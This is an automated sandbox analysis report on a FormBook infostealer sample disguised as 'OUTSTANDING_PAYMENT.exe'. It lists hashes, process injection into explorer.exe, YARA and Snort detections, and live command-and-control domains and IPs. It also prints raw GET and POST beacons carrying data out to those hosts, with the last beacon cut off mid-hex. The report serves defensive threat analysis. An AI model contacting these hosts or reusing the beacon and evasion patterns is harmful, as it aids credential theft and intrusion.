Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OUTSTANDING_PAYMENT.exe

Overview

General Information

Sample Name:OUTSTANDING_PAYMENT.exe
Analysis ID:830322
MD5:4832e17c1f6841aee2e1984a429ed946
SHA1:d7ad36c7bee5cb39aa5b77944ced8a716a8af545
SHA256:d0ac15eeb53f64ad6f399ead8724f38344daf243332f03790598c6716a04f162
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • OUTSTANDING_PAYMENT.exe (PID: 4224 cmdline: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe MD5: 4832E17C1F6841AEE2E1984A429ED946)
    • qhcqh.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z MD5: 41C9E29A7ED3640682A0003BE2DF4D93)
      • qhcqh.exe (PID: 5124 cmdline: C:\Users\user\AppData\Local\Temp\qhcqh.exe MD5: 41C9E29A7ED3640682A0003BE2DF4D93)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • rundll32.exe (PID: 4948 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.qhcqh.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.qhcqh.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20eb3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a0da:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.qhcqh.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19ed8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19974:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19fda:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a152:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc7ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18bbf:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fc6a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20c1d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.qhcqh.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.qhcqh.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x200b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbe22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x192da:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.3185.151.30.18149711802031453 03/20/23-09:09:32.876293
          SID:2031453
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3192.64.116.16249717802031449 03/20/23-09:09:54.051496
          SID:2031449
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.35.181.216.14149705802031449 03/20/23-09:09:09.878629
          SID:2031449
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3192.64.116.16249717802031412 03/20/23-09:09:54.051496
          SID:2031412
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.35.181.216.14149705802031453 03/20/23-09:09:09.878629
          SID:2031453
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3192.64.116.16249717802031453 03/20/23-09:09:54.051496
          SID:2031453
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3185.151.30.18149711802031449 03/20/23-09:09:32.876293
          SID:2031449
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.38.8.8.851139532023883 03/20/23-09:09:48.362224
          SID:2023883
          Source Port:51139
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:192.168.2.35.181.216.14149705802031412 03/20/23-09:09:09.878629
          SID:2031412
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3185.151.30.18149711802031412 03/20/23-09:09:32.876293
          SID:2031412
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: OUTSTANDING_PAYMENT.exeReversingLabs: Detection: 71%
          Source: OUTSTANDING_PAYMENT.exeVirustotal: Detection: 72%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.dirdikyepedia.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA==Avira URL Cloud: Label: malware
          Source: http://www.fanversewallet.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g==Avira URL Cloud: Label: malware
          Source: http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.allison2patrick.online/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.sexopornoxx.store/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.fanversewallet.com/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.landlotto.ru/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.gorwly.topAvira URL Cloud: Label: malware
          Source: http://www.dirdikyepedia.com/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.themssterofssuepnse.restAvira URL Cloud: Label: malware
          Source: http://www.fanversewallet.comAvira URL Cloud: Label: malware
          Source: http://www.gorwly.top/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.themssterofssuepnse.rest/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8Avira URL Cloud: Label: malware
          Source: http://www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.hudsonandbailey.uk/0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.allison2patrick.online/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA==Avira URL Cloud: Label: malware
          Source: http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.landlotto.ruAvira URL Cloud: Label: malware
          Source: http://www.hudsonandbailey.uk/0oqq/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: dirdikyepedia.comVirustotal: Detection: 8%Perma Link
          Source: allison2patrick.onlineVirustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeReversingLabs: Detection: 51%
          Machine Learning detection for sample
          Source: OUTSTANDING_PAYMENT.exeJoe Sandbox ML: detected
          Source: 13.2.rundll32.exe.4f53814.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.qhcqh.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.qhcqh.exe.980000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.2.rundll32.exe.30544f8.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.OUTSTANDING_PAYMENT.exe.28ebe10.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: qhcqh.exe, 00000001.00000003.259638663.000000001A710000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000001.00000003.253388114.000000001A580000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: qhcqh.exe, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 109.70.26.37 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 88.99.217.197 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.themssterofssuepnse.rest
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.249 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.209.159.142 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.karlscurry.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 192.64.116.162 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fanversewallet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.181.216.141 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.allison2patrick.online
          Source: C:\Windows\explorer.exeNetwork Connect: 62.4.21.190 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.virginhairweave.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.ty23vip.com
          Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thelastwill.net
          Source: C:\Windows\explorer.exeDomain query: www.gorwly.top
          Source: C:\Windows\explorer.exeDomain query: www.hudsonandbailey.uk
          Source: C:\Windows\explorer.exeDomain query: www.g2fm.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.landlotto.ru
          Source: C:\Windows\explorer.exeDomain query: www.glb-mobility.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.223 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ketoibabal.cyou
          Source: C:\Windows\explorer.exeDomain query: www.mynichemarket.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 185.151.30.181 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.brennmansoluciones.com
          Source: C:\Windows\explorer.exeDomain query: www.dirdikyepedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 203.245.24.47 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.58.118.167 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 5.181.216.141:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 5.181.216.141:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 5.181.216.141:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49711 -> 185.151.30.181:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49711 -> 185.151.30.181:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49711 -> 185.151.30.181:80
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51139 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49717 -> 192.64.116.162:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49717 -> 192.64.116.162:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49717 -> 192.64.116.162:80
          Source: Joe Sandbox ViewASN Name: RU-CENTERRU RU-CENTERRU
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.hudsonandbailey.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== HTTP/1.1Host: www.dirdikyepedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.g2fm.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA== HTTP/1.1Host: www.mynichemarket.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.landlotto.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=rLgLF68UEZ/jOQpbJtvCh1aTqtb77wkxPt9G2kjS7kCRXhXDnB6LHrmjVzEzts5aMFPYOamRADOx5QsnbVGJmi/5P43wAiKcGg== HTTP/1.1Host: www.gorwly.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA== HTTP/1.1Host: www.allison2patrick.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.glb-mobility.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g== HTTP/1.1Host: www.fanversewallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.karlscurry.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.hudsonandbailey.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 109.70.26.37 109.70.26.37
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 42 66 51 58 64 4a 44 7a 71 49 55 59 63 59 66 54 44 54 68 52 72 58 6b 32 6d 66 6c 69 6c 62 45 6b 47 31 41 32 39 4b 36 63 72 62 33 5f 4f 64 37 71 55 33 31 43 35 4c 4c 65 56 65 54 6f 31 70 72 72 38 55 33 35 6f 38 49 31 6a 5f 4f 46 6b 4c 38 33 57 47 68 37 63 39 63 4d 76 51 4e 4c 4f 6a 68 30 71 6d 28 48 62 6b 4a 75 6f 48 55 33 50 61 74 75 68 4d 57 55 73 45 49 56 47 32 72 74 4e 73 4e 52 63 34 46 53 75 74 63 53 33 51 30 50 41 5f 45 7a 36 53 70 67 4c 5f 79 65 37 36 5a 48 48 71 67 33 4a 6f 4e 6b 68 